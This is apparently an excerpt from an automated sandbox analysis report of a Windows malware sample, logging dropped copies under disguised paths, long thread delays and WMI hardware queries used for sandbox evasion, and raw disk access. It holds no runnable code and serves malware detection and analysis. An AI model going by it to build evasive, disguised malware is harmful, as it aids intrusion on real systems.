                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -571311s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -571156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -571045s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 6020Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -570935s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -570827s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -570717s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -570609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -570499s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -570390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -570264s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -570156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -570044s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -569937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -569828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -569719s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -569603s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -569333s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -569015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -568902s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -568797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -568687s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -568578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -568459s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -568344s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -568234s >= -30000s
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe TID: 4476Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1068Thread sleep time: -30000s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 7668Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe TID: 7444Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 5356Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe TID: 7452Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 7672Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe TID: 2164Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 2256Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Recovery\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599856
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599748
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599640
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599530
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599417
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599297
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599178
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 599023
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 3600000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 598719
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 597406
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 596969
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 596250
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 596015
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 595625
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 594812
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 594594
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 594250
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 593875
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 593734
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 593437
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 593140
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 592781
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 592199
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 591937
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 591578
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 591203
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 590656
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 590375
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 589437
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 589140
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 588672
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 588312
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 587946
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 587617
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 586703
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 586234
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 585875
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 585640
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 585328
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 584969
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 584437
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 584091
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 583686
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 583297
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 582812
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 582494
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 582187
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 581888
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 581544
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 581359
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 581216
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580969
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580765
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580562
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580362
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 580109
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 579684
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 579469
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 579265
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 579078
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578958
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578784
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578640
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578424
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578250
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578031
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 577850
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 577547
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576906
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576625
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576312
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576089
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575859
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575664
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575453
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575261
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575109
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574944
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574609
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574241
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574118
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573984
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573845
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573734
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573624
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573515
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573403
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573297
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573155
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573043
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572920
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572798
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572687
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572552
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572359
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572217
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572047
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571781
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571572
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571449
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571311
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571156
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571045
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 300000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570935
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570827
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570717
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570609
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570499
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570390
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570264
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570156
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570044
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569937
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569828
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569719
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569603
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569333
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569015
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568902
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568797
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568687
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568578
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568459
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568344
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568234
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
